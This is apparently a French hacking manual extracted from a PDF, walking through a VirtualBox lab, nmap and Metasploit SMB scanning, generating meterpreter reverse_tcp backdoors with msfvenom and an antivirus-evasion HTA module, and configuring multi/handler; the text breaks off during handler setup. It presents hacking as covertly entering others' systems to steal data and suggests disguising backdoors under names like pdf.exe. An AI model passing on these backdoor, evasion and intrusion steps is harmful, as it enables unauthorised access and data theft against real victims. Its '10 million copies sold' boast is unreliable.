Vous êtes sur la page 1sur 59

CE LIVRE EST 90% PRATIQUE ET EST FAIT POUR TOUS CEUX QUI

VEULENT ETRE DES HACKEURS PROFESSIONNELS

10 millions
d’exemplaires
vendus dans
le monde

MAIZAN KOUAME MELCHISEDEK

GSIMEL : HACKING PENETRATION SYSTÈME HACKER


1
jftsavoir@gmail.com
CHAPITRE :
I. LAB
II. GENERATION DE BACKDOOR
III. SCAN
IV. PIRATAGE SIMPLE
V. POST-EXPLOITATION
VI. ETRE ADMINISTRATEUR DE SYSTEME
VII. RECUPERATION D’ACCES DE LA CIBLE
VIII. REDESKTOP
IX. PESISTANCE
X. EFFACE LES TRACES

GSIMEL : HACKING PENETRATION SYSTÈME


2
jftsavoir@gmail.com
LIEN :

KALI LUNUX : https://www.kali.org/get-kali/#kali-virtual-machines

WINDOWS 10 : https://telecharger.malekal.com/download/windows-10-20h2-
octobre-2020-x64/#

WINDOWS 7 :https://telecharger.malekal.com/download/iso-windows-7-pro-64-
bits/#

WINDOWS 8 : https://telecharger.malekal.com/download/iso-windows8-64-bits/#

GSIMEL : HACKING PENETRATION SYSTÈME


3
jftsavoir@gmail.com
CHAPITRE I : LAB
DEFINITION
Un lab ou un laboratoire est un local pour faire des recherches scientifiques.
Le laboratoire est un local que nous allons mettre en place pour faire des recherches et
des tests.
Pour le fonctionnement du laboratoire nous allons faire quelques installations :
Windows et linux pour que tout soit prêt a l’utilisation. Cela est très important car nous
avons besoin de mettre en pratique les enseignements donnes pour le
perfectionnement de tous les étudiants.
INTSALLATION DE VIRTUAL BOX ET DES MACHINES VIRTUELS
Une machine virtuelle est un environnement virtualisé qui fonctionne sur
une machine physique. Elle permet d'émuler un OS sans l'installer physiquement sur
l'ordinateur. L’installation de machine virtuelle se fait grâce à un hyperviseur.
Un hyperviseur, également appelé moniteur de machine virtuelle, est un processus qui
crée et exécute des machines virtuelles sur une machine hôte.
Dans ce livre nous allons utiliser Virtual box qui est un hyperviseur.
NB : Assurez-vous d’avoir téléchargé les iso de Windows 7, 8 et 10
Passons à l’installation de Virtual box.
1- Aller sur www.virtualbox.org

2- Cliquez sur Download Virtual Box (Télécharger Virtual Box)

GSIMEL : HACKING PENETRATION SYSTÈME


4
jftsavoir@gmail.com
3- Cliquez sur Windows hosts. Sous le titre Virtual Box 5.2.8 Platform packages,
vous trouverez ce lien en bleu. Le fichier exécutable d'installation (EXE) de Virtual
Box est alors en voie de transfert sur votre disque dur.

4- Ouvrez le fichier exécutable Virtual Box EXE. Retrouvez le fichier exécutable


(dans le dossier Téléchargements), puis cliquez deux fois dessus. L'installation

de Virtual Box peut alors commencer.

5- Lisez et suivez les instructions. Opérez exactement comme suit :

 Cliquez sur Suivant sur les trois premières pages,


 Cliquez sur Oui au moment voulu,
 Cliquez sur Installer,
 Cliquez sur Oui au moment voulu.

GSIMEL : HACKING PENETRATION SYSTÈME


5
jftsavoir@gmail.com
6- Cliquez finalement sur Installer. Virtual Box commence alors son installation sur
votre disque dur

7- Cliquez sur Terminer. Le bouton est en bas et à droite de la fenêtre. La fenêtre


d'installation disparait d'elle-même et Virtual Box s'exécute. Vous êtes à présent
en mesure de créer votre machine virtuelle, laquelle vous permettra de faire
tourner n'importe quel système d'exploitation sur votre ordinateur.

8- Allez sur votre oracle Virtual box

GSIMEL : HACKING PENETRATION SYSTÈME


6
jftsavoir@gmail.com
9- Cliquez sur Nouveau ou new. Pour faciliter la tâche, un assistant d'installation
s'affiche à l'écran : il vous suffit alors de suivre les différentes instructions qui
apparaissent dans l'ordre.

10- Mettez le nom du système que vous désiriez installer et le type : si c’est un
Windows assurez-vous que vous aviez choisi « Microsoft Windows » si vous
voulez-installez un kali linux ou un système linux choisissez le type « linux »et les
« versions Windows (7 ou 8 ou 10) et l’architecture 32 ou 64 bit ».

11- Augmente les mémoires et la rame

GSIMEL : HACKING PENETRATION SYSTÈME


7
jftsavoir@gmail.com
12- Next ou suivant du début jusqu’à la fin

13- Créer le disque

GSIMEL : HACKING PENETRATION SYSTÈME


8
jftsavoir@gmail.com
GSIMEL : HACKING PENETRATION SYSTÈME
9
jftsavoir@gmail.com
INSTALLATION AVEC ISO

1- VOUS VERREZ VOTRE MACHINE PREINSTALLER

2- Cliquer sur démarrer

3- Cliquer sur l’icône explorer

4- Cliquer sur « ajouter »

GSIMEL : HACKING PENETRATION SYSTÈME


10
jftsavoir@gmail.com
5- Etant dans votre dossier choisissez le système selon le type et l’architecture
choisie au préalable puis cliquer sur « ouvrir ».

6- Cliquer sur choisir puis sur démarrer

GSIMEL : HACKING PENETRATION SYSTÈME


11
jftsavoir@gmail.com
7- Cliquer sur « suivant » pour poursuivre l’installation

8- Cliquer sur « installer maintenant » pour lancer l’installation

GSIMEL : HACKING PENETRATION SYSTÈME


12
jftsavoir@gmail.com
9- Accepte les termes et clique sur suivant

10- Veuillez choisir la deuxième option « personnalisée (options avancée) »

11- Choisissez le « Windows professionnel »

12- Cliquer sur « suivant »

GSIMEL : HACKING PENETRATION SYSTÈME


13
jftsavoir@gmail.com
13- L’installation se fera jusque la fin
14- La machine redémarrera plusieurs fois

15- Mettez le nom de la machine qui vous sera demande pour terminer

16- Cliquez sur « suivant »

17- Cliquez sur « paramètre recommande »

18- Votre machine est installée, les mêmes pratiques marcheront avec toutes vos
machines Windows virtuels

GSIMEL : HACKING PENETRATION SYSTÈME


14
jftsavoir@gmail.com
INSTALLATION AVEC KALI LINUX « TRES IMPORTANT POUR LES DIFFERENTS COURS »
Assurer vous d’avoir téléchargé l’iso de kali linux
1- Cliquez sur « nouvel »
2- Ensuite écrivez le nom « kali linux »
3- Choisissez une version « Debian (64 bit) » car votre iso doit être un (64 bit) pour
la formation.
4- Choisir le type « linux »
5- Cliquez sur « suivant » jusqu’à la fin

INSTALLATION AVEC L’ISO

1- Une fois le disque créé cliquez sur « démarrer »


2- Cliquer sur « explorer »

GSIMEL : HACKING PENETRATION SYSTÈME


15
jftsavoir@gmail.com
3- Cliquez sur « ajouter »

4- Choisissez votre « système »


5- Puis cliquer sur « choisir »
6- En suite sur « démarrer »

GSIMEL : HACKING PENETRATION SYSTÈME


16
jftsavoir@gmail.com
7- Choisissez « Graphical Install »

8- Options de langue si vous êtes francophone choisissez « french »

9- Puis cliquez « continuer » plusieurs fois jusqu’à atteindre « Les serveurs de


noms … vide.»
10- Cliquez encore sur « continuer »

GSIMEL : HACKING PENETRATION SYSTÈME


17
jftsavoir@gmail.com
11- Cliquez sur continuer jusqu’à atteindre « le nom de la machine … ce que vous
voulez. »

12- Laissez le nom « kali » puis cliquez sur « continuer »

13- Cliquez sur « continuer »

14- Mettez un nom alphanumérique de préférence puis cliquez sur continuer,


exemple : « kali1 »

15- Cliquez sur « continuer »

GSIMEL : HACKING PENETRATION SYSTÈME


18
jftsavoir@gmail.com
16- Mettez un nom alphanumérique diffèrent du précèdent, exemple : « kali12 »

17- Mettez un mot de passe et la confirmation du mot de passe

18- Cliquez sur « continuer »

GSIMEL : HACKING PENETRATION SYSTÈME


19
jftsavoir@gmail.com
19- Cliquez « continuer »

20- Cliquez sur « continuer »

21- Cliquez sur « continuer »

GSIMEL : HACKING PENETRATION SYSTÈME


20
jftsavoir@gmail.com
22- Cliquez sur « oui »
23- Puis sur « continuer »

24- Cliquez sur « gnome »


25- puis sur « continuer » et l’installation des logiciels se fera seul

26- Cliquer sur continuer

GSIMEL : HACKING PENETRATION SYSTÈME


21
jftsavoir@gmail.com
27- Cliquez sur « oui » et sur « continuer »

28- Choisissez la « deuxième option »


29- puis sur « continuer »

30- Installation terminer kali est prêt, tapez « continuer » pour terminer

GSIMEL : HACKING PENETRATION SYSTÈME


22
jftsavoir@gmail.com
31- Bienvenue sur kali, entrer votre mot de passe

32- Interface de kali linux

Maintenant que les installations sont terminées nous allons commencer la manipulation
de base de kali linux au chapitre suivant.

GSIMEL : HACKING PENETRATION SYSTÈME


23
jftsavoir@gmail.com
CHAPITRE II : MANIPULATION DE BASE DE LINUX

1. QU’EST- CE QUE LE SYSTEME LINUX


2. QUELS SONT LES LOGICIELS DE KALI
3. QUEL EST L’OUTIL QUI SERA UTILISE DANS CE COURS
4. PRE-REQUIS OU MANIPULATION DE BASE AVANT L’UTILISATION DE
NOTRE OUTIL DE PERFORMANT.
1- Qu’es ce qu’un système linux
Un système linux est un système d’exploitation dédié aux hackers, et ce système est
open source c’est-à-dire : un système sans licence.
2- Quels sont les logiciels de kali qui sont intégrés dans un linux : kali linux
Il existe une panoplie de logiciels intégrée dans kali linux : nmap ; msfconsole ; bully ;
arping etc…

Sachez que ces logiciels-là sont des logiciels utilisés dans le cyber sécurité, chaque
logiciel a un rôle bien précis qu’il joue. Exemple : « aircrack-ng permet à un pirate d’avoir
les accès d’un wifi, nmap permet à un pirate de scanner un réseau lorsqu’il réussit à
pénétrer le réseau ».
REMARQUE : chaque outil a son rôle bien précis.
3- QUEL EST L’OUTIL QUI SERA UTILISER DANS CE COURS
L’outil que nous allons utiliser est un outil multi tâche qui est utilisé ou qui est le plus
utilisé chez les pirates de toute catégorie c’est-à-dire « de débutant à expert en sécurité
informatique ».
Cet outil- là se nomme : METASPLOIT. C’est avec cet outil que nous allons travaillez tout
au long de ce livre pratique.

GSIMEL : HACKING PENETRATION SYSTÈME


24
jftsavoir@gmail.com
Metasploit regorge de nombreux outils pour pentest, social ingénierie, exploit zéro Day
etc. … il est l’outil le plus complet et utilisé dans les cybers attaque également.

4- PRE-REQUIS OU MANIPULATION DE BASE AVANT L’UTILISATION DE NOTRE


OUTIL DE PERFORMANCE.
Nous appelons base de linux les commandes qu’un hacker doit connaitre, sans cela il lui
sera difficile de comprendre les pratiques du cours. Grâce à ces commandes vous aurez
la base qui facilite la compréhension des cours du présent livre.
Les commandes de base de linux qui vous seront montrées seront les plus essentielles à
connaitre.
a. Terminal
Avant de commencer les bases il faut au préalable connaitre un terminal dans kali car
tout se fera avec le terminal.
Par définition un Terminal est un programme qui permet à un utilisateur d’interagir avec
le Shell.
Consigne : cliquez deux fois sur le terminal de votre kali linux.

b. Présentation du terminal
Voici comment un terminal de linux s’affiche, le « $ » veut dire que nous n’avons pas
plein autorité sur le terminal donc sur kali linux. Mais nous allons voir comment avoir la
pleine autorité sur kali linux.

GSIMEL : HACKING PENETRATION SYSTÈME


25
jftsavoir@gmail.com
c. Commande (1) de kali linux : « pwd »

Le «pwd »est une commande qui permet de savoir où vous vous trouvez à l’ instant. Si
vous le tapez dans kali, il vous permet de connaitre le chemin où vous vous trouvez dans
kali linux.
d. Commande (2) de kali linux : « ls »

La commande « ls » est une commande de kali qui vous permet de pouvoir afficher les
dossiers ou lister le contenu du chemin où vous vous trouvez.
e. Commande : « cd »
La commande « cd » est une commande de kali linux qui permet à un utilisateur
d’accéder à un dossier, exemple : « cd Bureau a permis à l’utilisateur d’accéder au
dossier Bureau de kali linux ». Aussi la commande « cd + nom du dossier » vous permet
de vous déplacer de votre position à une autre ou d’un dossier à un autre dossier dans
kali.

GSIMEL : HACKING PENETRATION SYSTÈME


26
jftsavoir@gmail.com
f. La commande « dir »
La commande « dir » Permet à un utilisateur de lister ou d’afficher le contenu d’un
dossier il joue un peu le rôle de la commande « ls ».

g. La commande : « cd .. »
La commande « cd .. » vous permet de quitter du dossier dans lequel vous étiez et
revenir dans le dossier précèdent. Exemple : « nous sommes quittés du dossier bureau
dans lequel nous étions avec un « cd .. ».

GSIMEL : HACKING PENETRATION SYSTÈME


27
jftsavoir@gmail.com
h. La commande : « mkdir »
La commande « mkdir + le nom du dossier » vous permet de créer un dossier qui portera
le nom que vous avez mis après avoir tapez « mkdir ».

Le dossier GSI a été créé avec succès.


i. La commande : « rmdir »
La commande « rmdir + nom du dossier » supprime le fichier dont vous avez spécifié le
nom. Exemple : « rmdir gsi » nous constatons que gsi qui avait été créé avec « mkdir » a
été supprimé.

j. La commande : « cp »
La commande « cp -r + pwd du dossier à copier + pwd du dossier qui reçoit la copie » ou
« cp -r + chemin du dossier à copier + chemin du dossier qui reçoit la copie ». Exemple :
nous avons copié le dossier « Bureau » dans le dossier « Téléchargements ».

k. La commande « clear »
GSIMEL : HACKING PENETRATION SYSTÈME
28
jftsavoir@gmail.com
La commande « clear » vous permets de nettoyer le terminal.
j. La commande : « sudo su ou sudo -s »
La commande « sudo su » vous permet de passer en super utilisateur donc avoir le plein
droit sur votre système kali linux.
NB : après avoir tapez la commande Mettre son mot de passe même si elle est invisible.

REMARQUE : Vous verrez le symbole « $ » en « # » ce symbole « # » une fois afficher


confirme que vous êtes en super utilisateur.
k. La commande « exit »

Cette commande vous permet de quitter le super utilisateur et également si vous le


retapez il vous permet de quitter le terminal.
Voici les bases les plus essentielles à connaitre et à maitriser avant la poursuite de la
formation.

GSIMEL : HACKING PENETRATION SYSTÈME


29
jftsavoir@gmail.com
CHAPITRE II : SCAN DE VULNERABILITE
Définition
Un scan de vulnérabilité est un programme conçu pour identifier des vulnérabilités dans
un système d’exploitation ou un réseau informatique.
Avant de faire un scan de vulnérabilité : Parlons du réseau sur Virtual box. Il y a deux
moyens de travailler en réseau « un réseau ou vous n’avez pas besoin de connexion et
un réseau ou vous avez besoin de connexion pour mieux faire le travail ».
RESEAU NAT : configurer le réseau d’une machine en « réseau nat » c’est permettre à
cette machine de recevoir (Windows) ou d’émettre (kali linux) des attaques
informatiques sans connexion mais en local pour vos tests.
ACCES PAR PONT : configurer le réseau d’une machine en accès par pont c’est permettre
à cette machine de recevoir (Windows) ou d’émettre (kali linux) des attaques
informatique avec la connexion et cela peut se faire à distance.
CONFIGURATION PRATIQUE DE VOTRE RESEAU OU LAB :
a- Cliquez sur votre machine à configurer :

b- Cliquez sur configuration

GSIMEL : HACKING PENETRATION SYSTÈME


30
jftsavoir@gmail.com
c- Cliquez sur RESEAU , puis sur RESEAU NAT « pour travailler sans connexion »
d- ou ACCES PAR PONT « pour travailler avec la connexion »
e- Cliquez sur OK pour valider
Voici

comment vous pouvez faire la configuration de votre réseau pour travailler sans
problème avec aisance.
NB : Assurez-vous de mettre toutes vos machines dans le même réseau c’est-à-dire si
« votre kali linux est en réseau nat mettez également toutes vos Windows en réseau
nat ».
PASSONS MAINTENANT AU SCAN DE VULNERABILITE :
a- Cliquez sur démarrer de votre « kali linux et un de vos Windows »

NB : Une fois votre kali linux et votre machine Windows lancés, nous commencerons par
désactiver les pare - feux de Windows activés :
a- Tapez dans recherche « panneau de configuration» puis OK et cliquez sur
SYSTEME ET SECURITE.

GSIMEL : HACKING PENETRATION SYSTÈME


31
jftsavoir@gmail.com
b- Cliquez sur « Pare-feu Windows »

c- Cliquer sur « ACTIVER OU DESACTIVER LE PARE-FEU WINDOWS »

GSIMEL : HACKING PENETRATION SYSTÈME


32
jftsavoir@gmail.com
d- Cliquer sur « Désactiver le pare-feu » puis valider avec OK.

Nous allons faire le scan avec notre machine kali linux.


e- Allez sur le terminal de votre kali linux

f- Puis passez en « root » c’est-à-dire en mode « super utilisateur »

Nous allons exploiter un outil de kali linux qui se nomme : NMAP et DB_NMAP
GSIMEL : HACKING PENETRATION SYSTÈME
33
jftsavoir@gmail.com
NMAP est un outil qui permet de scanner un réseau informatique, de trouver des
vulnérabilités ou des portes ouvertes sur les machines connectées au réseau, voir même
donner la faciliter à un pirate de trouver des failles. NMAP est considéré comme un outil
perfectionné en hacking pour le scannage. NB : il y a d’autres outils également très
perfectionnés.
Dans ce cours nous utiliserons pour commencer : NMAP
g- Faites ces configurations avant de commencer sur kali linux et exploiter ses
ressources.

 Activez le service « APACHE2 »

 Activez le service « postgresql et msfdb »

h- NMAP

Pour avoir de l’aide pour mieux explorer un module dans kali, mettez le nom de
l’application et mettez ceci : « -h » donc nous allons mettre « nmap -h pour voir les
différentes options que nous avons pour mieux exploiter nmap et ses ressources »
GSIMEL : HACKING PENETRATION SYSTÈME
34
jftsavoir@gmail.com
 Apres avoir mis cette commande vous allez voir une panoplie d’options
devant vous, ce que vous pouvez exploiter seul chez vous pour avoir des
expériences. Nous allons utiliser quelques commandes les plus utilisées en
pentest pour scanner.

 « nmap -o + plage d’adresse IP »


La plage d’adresse IP, ou sous-réseau, regroupe des adresses IP publiques consécutives.
Pour déterminer la plage d’adresse IP il faut simplement :
Connaitre les différents types de classe d’adresse, il existe cinq (5) types de classe
d’adresse mais nous verrons les 3 essentielles :
Classe A : le premier octet a une valeur comprise entre 1 et 126 ; soit un bit de poids fort
égal à 0 « masque : 255.0.0.0 ; adresses réseau : 1.0.0.0 – 126.255.255.255 ; « /8 » ».
Classe B : le premier octet a une valeur comprise entre 128 et 191 ; soit 2 bits de poids
fort égaux à 10 « masque : 255.255.0.0 ; adresse réseau : 128.0.0.0 – 191.255.255.255 ;
« /16 » ».
Classe C : le premier octet a une valeur comprise entre 192 et 223 ; soit 3 bits de poids
fort égaux à 110 « masque : 255.255.255.0 ; adresse réseau : 192.0.0.0 –
223.255.255.255 ; « /24 » ».

Vous comprendrez plus dans la pratique pourquoi il faut connaitre ce petit principe.

Vous devez taper « ifconfig » cette commande est pour connaitre votre adresse IP.
C’est écrit « broadcast : 10.10.1.255 et netmark : 255.255.255.0 » cela correspond à la
classe C donc lors du scan nous allons scanner le réseau avec « 10.10.1.0/24 » nous
allons changer le « 255 » du broadcast en « 0 » et ajouter un « /24 » à la fin.
Cela nous permettra de scanner et de trouver tous ceux qui sont dans le réseau.

GSIMEL : HACKING PENETRATION SYSTÈME


35
jftsavoir@gmail.com
Vous ajoutez mettez la commande selon votre adresse IP « assurer vous de mettre à la
fin de l’IP soit 0 ou 1 ».
Dans la pratique le scanner vous envoie des informations exactes sur tous ceux qui sont
dans le même réseau.

Le scanner avec la commande m’a permis de connaitre l’adresse IP d’une cible et le type
de système qu’utilise la cible sans même toucher la machine.

Nous avons également d’autres options que nous allons explorer :


 « db_nmap –A –Ss –v + plage d’adresse IP »

Vous pouvez également mettre cette commande ; elle également va scanner tous ceux
qui se trouvent dans votre réseau et de voir si une machine est lié à une adresse IP. Si
oui elle affichera automatiquement le port ou le port et l’adresse IP de la machine.
Résultat : tous ceux qui sont encadrés en vert sont des adresses IP qui n’ont pas de
machines liées à eux et tous ceux qui sont en rouge sont des adresses IP qui sont liés à
des machines.

GSIMEL : HACKING PENETRATION SYSTÈME


36
jftsavoir@gmail.com
Le résultat du scan est celle-ci.
Nous continuons avec une autre commande qui est :
 « db_nmap –h »
Db_nmap a les même options que nmap sur le terminal, la particularité de db_nmap est
que on ne l’utilise que sur « MSFCONSOLE ». Db_nmap est aussi un scanner de kali linux
qui permet de scanner un réseau informatique.
NB : Avant de pouvoir utiliser la commande il faut lancer Metasploit « MSFCONSOLE »

Puis vous tapez la commande « db_nmap –h » et validez :

GSIMEL : HACKING PENETRATION SYSTÈME


37
jftsavoir@gmail.com
Apres avoir mis la commande vous aurez une panoplie d’options devant vous comme
nmap, à vrai dire ce sont les mêmes commandes et les mêmes options.
Nous utiliserons une de ces commandes avec db_nmap :

Ce sont les mêmes commandes que nmap mais utilisés avec db_nmap donnera le même
résultat.
Résultat

GSIMEL : HACKING PENETRATION SYSTÈME


38
jftsavoir@gmail.com
 « scanner/smb »
« Le scanner/smb » est un module de « metasploit » qui permet de scanner un réseau
sur précisément les vulnérabilité « smb » des machines Windows 7,8 ,10 dans un réseau.
Ce scanner est rapide et efficace et il nous sera d’une très grande utilité dans ce livre.
 Pour chercher un module dans metasploit ou msfconsole, nous utilisons
la commande « search + nom du module ». Pratique :

« Search scanner/smb » nous a permis de trouver tous les scanner/smb de Metasploit.


Ici pour charger un module ou pour utiliser un module dans msfconsole ou Metasploit,
nous utilisons deux types de moyens : « use + indice (1ou 2 ou 10 ou 13 etc…) ou use +
nom complet du module ».
Pratique (le scanner qui nous intéresse est ici l’indice 12
« auxiliary/scanner/smb/smb_ms17_010 ») :

(1) Pour l’utilisez-vous devez mettre « use + indice (12) ».


(2) Pour l’utiliser vous devez mettre « use +
auxiliary/scanner/smb/smb_ms17_010 »
Vérifiez les options en tapant « options » :

GSIMEL : HACKING PENETRATION SYSTÈME


39
jftsavoir@gmail.com
Sachez ceci :
(1) Dans cet options nous ne changerons le « THREADS » le THREADS est la rapidité
du scanner ; nous allons améliorer cela.
(2) Dans cette option nous ajouterons dans « RHOSTS » la plage d’adresse à scanner.
NB : Dans le RHOSTS on n’ajoute soit la plage d’adresse IP ou une adresse IP cible déjà
scanner.
(3) Pour changer ou charger (ajouter) un module ; vous devez mettre « set »
Pratique :

Voici comment vous devez changer ou améliorer les options d’un module avec la
commande « set ». Vous pouvez ajouter dans « rhosts » la plage d’adresse IP pour
scanner tout le réseau.

 Enfin pour exécuter la commande vous devez utiliser la commande (run


ou exploit).

GSIMEL : HACKING PENETRATION SYSTÈME


40
jftsavoir@gmail.com
La commande « run ou exploit » vous permet de mettre le module en action et cela
vous ramènera des machines ou toutes les machines vulnérables à la faille ms17_010.
Consigne : Le scanner de vulnérabilité est très essentiel pour tout hacker donc vous
devez maitriser cela avant de passer au cours suivant.

GSIMEL : HACKING PENETRATION SYSTÈME


41
jftsavoir@gmail.com
Chapitre III : GENERATION DE BACKDOOR

a- DEFINITION
Un backdoor est également appeler charges utiles ou payload malveillant, ce sont des
éléments de cyberattaques qui provoquent des dégâts « ils permettent à un pirate
d’accéder à des ordinateurs ». Un payload ou backdoor permet aux pirates de
pouvoir faire :

 Des vols de données


 Une surveillance des activités de la cible atteint
 L’affichage de publicités
 La suppression ou la modification de fichiers
 Le téléchargement des fichiers
 L’exécution de processus en arrière-plan
Backdoor ou payload ou charge utile sont les plus utilisés en cyberattaque pour pénétrer
des systèmes.
Dans ce cours nous verrons comment créer des backdoors.
b- Création de payload ou backdoor avec msfvenom
 Définition
Msfvenom est un logiciel du Framework metasploit, il permet de générer, encoder des
payloads.
 Utilisation de msfvenom
Pour savoir comment utiliser msfvenom vous devez mettre la commande : « msfvenom
–h ».

Vous aurez automatiquement les options pour l’utilisation du module et


également une aide.

GSIMEL : HACKING PENETRATION SYSTÈME


42
jftsavoir@gmail.com
L’encadrement ci-dessus est l’aide idéal presque complète pour générer un backdoor. Et
les options qui sont en dessous permettent de pouvoir encoder, choisir l’architecture et
le format nécessaire.
 Créons un backdoor pour Windows « architecture x64 »

Ce backdoor nous permettra de pirater n’importe quel système Windows en


architecture « x64 ».
Pour créer un backdoor en architecture « x64 », vous devez :

 Spécifier le payload : Windows/x64/meterpreter/reverse_tcp : le


payload permet de créer une connexion entre la machine victime et
celle de la machine attaquante.
 Spécifier un port : le port est le numéro unique codée sur 16bits qui
permet l’écoute sur la machine cible NB : choisissez le port que vous
voulez si vous n’êtes pas en porforwarding avec un vpn.
 Spécifier un IP : l’ip est l’adresse IP numéro d’identification de chaque
appareil connectée à un réseau utilisant le protocole internet « celui-
ci doit être celui de votre « IP » kali linux ou du « IP » vpn utiliser par
votre kali linux ».
 Spécifier le chemin de sortie en spécifiant l’extension : l’extension
pour pirater un système Windows est en « Exe ».
Cherchons notre ip : pour trouver votre ip sur kali linux, vous devez tapez dans votre
terminal : « IFCONFIG ».
Cherchons notre chemin de sortie : nous le trouvons avec « pwd ».

GSIMEL : HACKING PENETRATION SYSTÈME


43
jftsavoir@gmail.com
Pour mettre le backdoor sur le bureau il faut accéder au bureau avec « cd Bureau » et en
suite mettre le « pwd » pour avoir le chemin.
FAISONS SORTIRE NOTRE BACKDOOR MAINTENANT.
X64 :

Une fois dans :


 Avoir mis dans LHOST votre adresse ip
 Vous mettez le chemin de sortie du backdoor sur le bureau
 Puis mettez le nom du backdoor « selon votre choix » mais en « .Exe ». Exemple :
backdoor.exe ; pdf.exe ; chaussure.exe ; etc …
 Puis exécuter la création en appuyant sur : « ENTRER OU ENTER ».
X86

Pour les architectures 32 bits ou x86 nous enlevons seulement le x64 du payload et c’est
tout. Cela vous permet de pirater tous les systèmes en x86 bits.
c- Création de backdoor avec metasploit « msfconsole ».
 Définition de metasploit « msfconsole »
Metasploit pen testing tool, est un projet (open source) en relation avec la sécurité
informatique. Son but est de fournir des informations sur les vulnérabilités du système

GSIMEL : HACKING PENETRATION SYSTÈME


44
jftsavoir@gmail.com
informatique et d’aider à la pénétration et au développement de signatures pour les
systèmes de détection d’intrusion (IDS ; Intrusion Détection System).

 Modules Exploits
C’est des scripts en Ruby qui nous permettent d’exploiter une vulnérabilité sur une
machine distante. On peut dire que l’exploit nous donne la possibilité de se connecter à
une machine vulnérable sans la toucher.
 Modules Payloads
C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de non
seulement pénétrer le système mais également contrôler la machine d’une victime.
 Modules auxiliary
C’est des modules utilises pour diverses taches comme scan de port, sniffing, scan
services. Une fois l’exploit et le payload exécutés sur une machine vulnérable a une
faille, on peut faire ce qu’on veut sur le système comme télécharger les données de la
cible, mise en place d’un malware, capture de frappe, etc … .
 Modules évasion
Sont des nouveaux modules qui sont conçus pour aider à créer des charges utiles ou
backdoor qui peuvent échapper aux logiciels antivirus (AV) sur le système cible.
 Modules encodeurs
Sont de code qui permette d’échapper aux anti-virus.
 Modules post
Sont des scripts qui permettent d’exploiter une session après piratage.
GSIMEL : HACKING PENETRATION SYSTÈME
45
jftsavoir@gmail.com
Tous ces modules seront explorés dans ce cours.

Continuons avec la création de backdoor.


 Nous allons utiliser un module d’évasion pour la création de
backdoor « évasion ».

Pour trouver le module de backdoor en hta d’évasion, vous devez tapez « search
evasion ». Cela vous donnera une panoplie de backdoor dit indétectable « ce qui n’est
pas totalement vrai ».
Pour utiliser un module nous devons tapez « use + nom du module ou use + indice du
module ».
Passons à la pratique :

GSIMEL : HACKING PENETRATION SYSTÈME


46
jftsavoir@gmail.com
Pour faire notre backdoor nous allons utiliser un module qui a pour nom :
« evasion/Windows/windows_defender_js_hta » et pour indice : « 6 ».
Pour l’utilisation du module pour créer notre backdoor, nous devons mettre : « use
evasion/Windows/windows_defender_js_hta ou use 6 ». Voici comment on utilise un
module.
 Une fois après avoir spécifié le module que nous allons utiliser
nous allons maintenant voir les options de ce module pour
générer un backdoor.

Nous allons remplir les options suivant :


 FILENAME : « nom que vous voulez et extension hta. Exemple : SUCCES.hta ;
microsft.hta etc... »
 LPORT : « le port de votre choix entre 1 et 1000 »
 LHOST : votre adresse IP avec « ifconfig ».
 Exécuter le module avec : « run ou exploit »
 Mettre le backdoor sur le bureau ; il faut juste appliquer la pratique des chemins
« pwd ».
Pour remplir ces options voici comment on procède :

GSIMEL : HACKING PENETRATION SYSTÈME


47
jftsavoir@gmail.com
Le backdoor est maintenant sur le bureau de kali linux. Vérifions :

Nous venons de mettre ou de créer un backdoor en architecture x64 bits.


Ce backdoor ne nous permet que de pirater les Windows x64 ou 64bits.
Apres avoir appris à créer un backdoor ou payload ou charge utile. Vous avez
maintenant la capacité de faire le piratage de système. Dans le prochain chapitre nous
aurons à faire le piratage de système.

GSIMEL : HACKING PENETRATION SYSTÈME


48
jftsavoir@gmail.com
CHAPITRE VIII : HACKING « PIRATAGE SIMPLE »
 DEFINITION
Le hacking ou piratage est une pratique qui consiste à s’introduire indument dans le
système d’un tiers sans se faire remarquer pour modifier le contenu et l’organisation,
voler des données etc … de la personne.
 PROCEDURE POUR HACKER UN SYSTEME OU UN ORDINATEUR
Il existe différent type de procédure pour hacker un système ou un ordinateur. Nous
allons utiliser d’abord la procédure la plus utilisée par les pirates et qui est valable à
100%.
LE HACKING OU PIRATAGE AVEC BACKDOOR EXECUTER PAR LA CIBLE.
 DESACTIVER L’ANTI-VIRUS DE VOTRE MACHINE WINDOWS (cible) DE
VIRTUALBOX

 ALLEZ SUR VOTRE KALI LINUX, PUIS ALLEZ DANS LE DOSSIER FICHIER

GSIMEL : HACKING PENETRATION SYSTÈME


49
jftsavoir@gmail.com
 Allez dans le dossier emplacement, puis dans le dossier ordinateur, puis
dans le dossier var, ensuite dans le dossier www, enfin dans le dossier
html « var/www/html » c’est un chemin très important à connaitre.

 Une fois sur votre terminal, faites la configuration « la configuration est


très importante » pour faire les pratiques sans problème : activez
postgresql et apache2 et msfdb.

 Nous passons à la création de backdoor avec lequel nous allons pirater


tous les systèmes selon l’architecture du backdoor. Suivez et faite la
pratique :

GSIMEL : HACKING PENETRATION SYSTÈME


50
jftsavoir@gmail.com
La création de backdoor que nous venons de faire est un backdoor susceptible de
pirater tous les Windows (x64) ou (64bits), et mettez le backdoor dans le dossier
(var/www/html).
 Apres cela, nous passons au lancement de metasploit.

Dans les modules de metasploit nous utiliserons un module très important qui nous
permettra de contrôler et de faire tout le piratage avec metasploit, ce module ce
nomme : « multi/handler ».
NB : Sans cela il est impossible de parler de piratage et cela nécessite que vous reteniez
le port que vous avez utilisé lors de la création de backdoor.
 Nous utiliserons le module « multi/handler »
Le module multi/handler permet à un pirate d’écouter le port du backdoor lorsqu’il est
exécuté et de lui envoyer une session.
IMPORTANT A SUIVRE ETAPE PAR ETAPE :
Passons à la configuration de multi/handler avant d’exécuter le backdoor :

GSIMEL : HACKING PENETRATION SYSTÈME


51
jftsavoir@gmail.com
 Vous cherchez d’abord le module « multi/handler », avec la commande : « search
multi/handler ». Le module « multi/handler » aura pour indice dans la plus part
des kalis l’indice « 6 ».
 Vous utiliserez le module avec ceci : « use multi/handler OU use 6 »
 Chargé et prêt à l’utilisation nous allons le configurer dans les détails

Sur l’image ci-dessus nous observons des options de « multi/handler a remplirai ».


 Nous changerons d’abord le payload. Car le payload que nous avons utilisé est le
payload de l’architecture « x64 » or le payload utilisé par notre module
multi/handler par défaut est pour l’architecture « x86 ».
 Pour le changer en architecture x64 comme le payload utilisé
pour faire notre backdoor nous allons mettre cette commande
: « set payload Windows/x64/meterpreter/reverse_tcp ». Puis
valider.

GSIMEL : HACKING PENETRATION SYSTÈME


52
jftsavoir@gmail.com
